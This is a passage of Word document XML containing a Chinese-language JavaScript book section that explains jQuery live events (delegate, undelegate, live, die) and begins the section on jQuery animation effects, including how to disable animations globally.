      <w:bookmarkStart w:id="486" w:name="19_4_8_Shi_Shi_Shi_Jian_"/>
      <w:r>
        <w:t>19.4.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　实时事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="486"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法绑定事件处理程序到指定文档元素，就与</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListner()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>attachEvent()</w:t>
      </w:r>
      <w:r>
        <w:t>（参见第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章）一样。但是，使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用经常动态创建新元素。如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>文档中的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素绑定了事件处理程序，接着又创建了带有＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的新文档内容，这些新元素和老元素不会拥有相同的事件处理程序，其行为将不一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>实时事件</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>来解决这一问题。要使用实时事件，需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>delegate()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undelegate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来替代</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>unbind()</w:t>
      </w:r>
      <w:r>
        <w:t>。通常，在</w:t>
      </w:r>
      <w:r>
        <w:t>$(document)</w:t>
      </w:r>
      <w:r>
        <w:t>上调用</w:t>
      </w:r>
      <w:r>
        <w:t>delegate()</w:t>
      </w:r>
      <w:r>
        <w:t>，并传入一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器字符串、一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件类型字符串以及一个</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>序函数。它会在</w:t>
      </w:r>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>上（或</w:t>
      </w:r>
      <w:r>
        <w:t>jQu</w:t>
      </w:r>
      <w:r>
        <w:t>ery</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的任何元素上）注册一个内部处理程序。当指定类型的事件冒泡到该内部处理程序时，它会判断事件目标（该事件所发生在的元素）是否匹配选择器字符串。如果匹配，则调用指定的处理程序函数。因此，为了同时处理老的和新创建的＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上的</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>事件，可能需要像下面这样注册处理程序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(document).delegate("a","mouseover",linkHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>否则，需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>来处理文档中的静态部分，然后使用</w:t>
      </w:r>
      <w:r>
        <w:t>delegate()</w:t>
      </w:r>
      <w:r>
        <w:t>来处理动态修改的部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>静态链接的静态事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a").bind("mouseover",linkHandler);//</w:t>
      </w:r>
      <w:r>
        <w:t>文档中动态更新的部分使用实时事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(".dynamic").delegate("a","mouseover",linkHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>方法拥有三参数版本来指定事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性一样，</w:t>
      </w:r>
      <w:r>
        <w:t>delegate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法拥有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>参数版本用来干同样的事。使用这种版本时，将数据值作为第三参数传入，处理程序函数则作为第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>理解这点很重要：实时事件依赖于事件冒泡。当事件冒泡到</w:t>
      </w:r>
      <w:r>
        <w:t>docu</w:t>
      </w:r>
      <w:r>
        <w:t>ment</w:t>
      </w:r>
      <w:r>
        <w:t>对象时，它有可能已经传递给了很多静态事件处理程序。如果这些处理程序中有任何一个调用了</w:t>
      </w:r>
      <w:r>
        <w:t>Event</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>cancelBubble()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，实时事件处理程序将永远不会调用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>live()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，也可以用来注册实时事件。</w:t>
      </w:r>
      <w:r>
        <w:t>live()</w:t>
      </w:r>
      <w:r>
        <w:t>比</w:t>
      </w:r>
      <w:r>
        <w:t>delegate()</w:t>
      </w:r>
      <w:r>
        <w:t>更难理解一点，但与</w:t>
      </w:r>
      <w:r>
        <w:t>bind()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>live()</w:t>
      </w:r>
      <w:r>
        <w:t>也有两参数和三参数的调用形式，并且在实际中用得更普遍。上面对</w:t>
      </w:r>
      <w:r>
        <w:t>delegate()</w:t>
      </w:r>
      <w:r>
        <w:t>的两个调用，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>live()</w:t>
      </w:r>
      <w:r>
        <w:t>来写，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a").live("mouseover",l</w:t>
      </w:r>
      <w:r>
        <w:t>inkHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("a",$(".dynamic")).live("mouseover",linkHandler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象上调用</w:t>
      </w:r>
      <w:r>
        <w:t>live()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时，该对象中的元素实际上并没有使用。真正有关系的是用来创建</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象的选择器字符串和上下文对象（传递给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个和第二个参数）。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象通过</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>selector</w:t>
      </w:r>
      <w:r>
        <w:t>属性来使得这些值可用（参见</w:t>
      </w:r>
      <w:r>
        <w:t>19.1.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）。通常，仅带一个参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>是当前文档。因此，对于</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，下面两行代码做的事</w:t>
      </w:r>
      <w:r>
        <w:t>情是一样的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x.live(type,handler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(x.context).delegate(x.selector,type,handler);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注销实时事件处理程序，使用</w:t>
      </w:r>
      <w:r>
        <w:t>die()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undelegate()</w:t>
      </w:r>
      <w:r>
        <w:t>。可以带一个或两个参数调用</w:t>
      </w:r>
      <w:r>
        <w:t>die()</w:t>
      </w:r>
      <w:r>
        <w:t>。带有一个事件类型参数时，</w:t>
      </w:r>
      <w:r>
        <w:t>die()</w:t>
      </w:r>
      <w:r>
        <w:t>会移除匹配选择器和事件类型的所有实时事件处理程序。带有事件类型和处理程序函数参数时，它只会移除掉指定的处理程序。一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').die('mouseover');//</w:t>
      </w:r>
      <w:r>
        <w:t>移除＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>事件的</w:t>
      </w:r>
      <w:r>
        <w:t>所有实时处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$('a').die('mouseover',linkHandler);//</w:t>
      </w:r>
      <w:r>
        <w:t>只移除一个指定的实时处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>undelegate()</w:t>
      </w:r>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>die()</w:t>
      </w:r>
      <w:r>
        <w:t>，但更显式地分开</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>（内部事件处理程序所注册的元素）和选择器字符串。上面对</w:t>
      </w:r>
      <w:r>
        <w:t>die()</w:t>
      </w:r>
      <w:r>
        <w:t>的调用可以写成下面这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(document).undelegate('a');//</w:t>
      </w:r>
      <w:r>
        <w:t>移除＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上的所有实时处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(document).undelegate('a','mouseover');//</w:t>
      </w:r>
      <w:r>
        <w:t>移除</w:t>
      </w:r>
      <w:r>
        <w:t>mouseover</w:t>
      </w:r>
      <w:r>
        <w:t>的实时处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(do</w:t>
      </w:r>
      <w:r>
        <w:t>cument).undelegate('a','mouseover',linkHandler);//</w:t>
      </w:r>
      <w:r>
        <w:t>移除指定处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，</w:t>
      </w:r>
      <w:r>
        <w:t>undelegate()</w:t>
      </w:r>
      <w:r>
        <w:t>也不带任何参数调用。在这种情况下，它会注销从选中元素委托的所有实时事件处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="487" w:name="19_5_Dong_Hua_Xiao_Guo_"/>
      <w:r>
        <w:t>19.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　动画效果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="487"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>章展示了如何通过脚本来修改文档元素的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式。例如，通过设置</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>visibility</w:t>
      </w:r>
      <w:r>
        <w:t>属性，可以显示和隐藏元素。</w:t>
      </w:r>
      <w:r>
        <w:t>16.3.1</w:t>
      </w:r>
      <w:r>
        <w:t>节进一步演示了如何通过脚本控制</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>来产生动画视觉效果。例如，除了仅让一个元素消失，还可以在半秒的时间内逐步减少</w:t>
      </w:r>
      <w:r>
        <w:t>opacity</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，使其快速淡出，而不是瞬间消失。这些动画视觉效果能给用户带来更愉悦的体验，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>使其实现起来更简单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>fadeIn()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>等简单方法来实现常见视觉效果。除了简单动画方法，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>还定义了一个</w:t>
      </w:r>
      <w:r>
        <w:t>anima</w:t>
      </w:r>
      <w:r>
        <w:t>te()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，用来实现更复杂的自定义动画。下面将讲述这些简单动画方法，以及更通用的</w:t>
      </w:r>
      <w:r>
        <w:t>animate()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。首先，让我们了解下</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画框架的一些通用特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每段动画都有时长，用来指定动画效果持续多长时间。可以使用毫秒数值或字符串来指定时长。字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"fast"</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>200ms</w:t>
      </w:r>
      <w:r>
        <w:t>。字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"slow"</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>600ms</w:t>
      </w:r>
      <w:r>
        <w:t>。如果指定的字符串时长</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>无法识别，则采用默认时长</w:t>
      </w:r>
      <w:r>
        <w:t>400ms</w:t>
      </w:r>
      <w:r>
        <w:t>。可以给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.fx.speeds</w:t>
      </w:r>
      <w:r>
        <w:t>添加新的字符串到数值映射关系来定义新的时长名字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.fx.speeds["me</w:t>
      </w:r>
      <w:r>
        <w:t>dium-fast"]=300;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.fx.speeds["medium-slow"]=500;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画方法经常使用动画时长来作为可选的第一个参数。如果省略时长参数，通常会得到默认值</w:t>
      </w:r>
      <w:r>
        <w:t>400ms</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，省略时长时，有部分方法会立刻跳到最后一帧，没有中间的动画效果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#message").fadeIn();//</w:t>
      </w:r>
      <w:r>
        <w:t>用淡入效果显示元素，持续</w:t>
      </w:r>
      <w:r>
        <w:t>400ms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("#message").fadeOut("fast");//</w:t>
      </w:r>
      <w:r>
        <w:t>用淡出效果隐藏元素，持续</w:t>
      </w:r>
      <w:r>
        <w:t>200ms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>禁用动画</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在很多网站上，动画视觉效果已经成为标配，但是，并不是所有用户都喜欢：有些用户觉得动画分散注意力，有些则感觉动画导致操作不便。残障用户可能会发现动画会妨碍屏幕阅读器等辅助软件正常工作，老旧硬件上的用户则会感觉动画会耗费很多</w:t>
      </w:r>
      <w:r>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:t>时间。为了对用户保持尊重，我们通常应该让动画简单朴素，并提供一个选项可以彻底禁用动画。使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>可以非常简单地全局禁用所有动画：简单地设置</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.fx.off</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>就好。该设置会将每段动画的时长都变成</w:t>
      </w:r>
      <w:r>
        <w:t>0ms</w:t>
      </w:r>
      <w:r>
        <w:t>，这样动画看起来就像是没有动画效果的立刻切换了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了让最终用户</w:t>
      </w:r>
      <w:r>
        <w:t>可以禁用动画，可以在脚本上使用如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(".stopmoving").click(function(){jQuery.fx.off=true;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这样，当网页设计者在页面中加入带有</w:t>
      </w:r>
      <w:r>
        <w:t>"stopmoving"</w:t>
      </w:r>
      <w:r>
        <w:t>类的元素时，用户就可以单击该元素来禁用动画。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>动画是异步的。调用</w:t>
      </w:r>
      <w:r>
        <w:t>fadeIn()</w:t>
      </w:r>
      <w:r>
        <w:t>等动画方法时，它会立刻返回，动画则在</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后台</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>执行。由于动画方法会在动画完成之前返回，因此可以向很多</w:t>
      </w:r>
      <w:r>
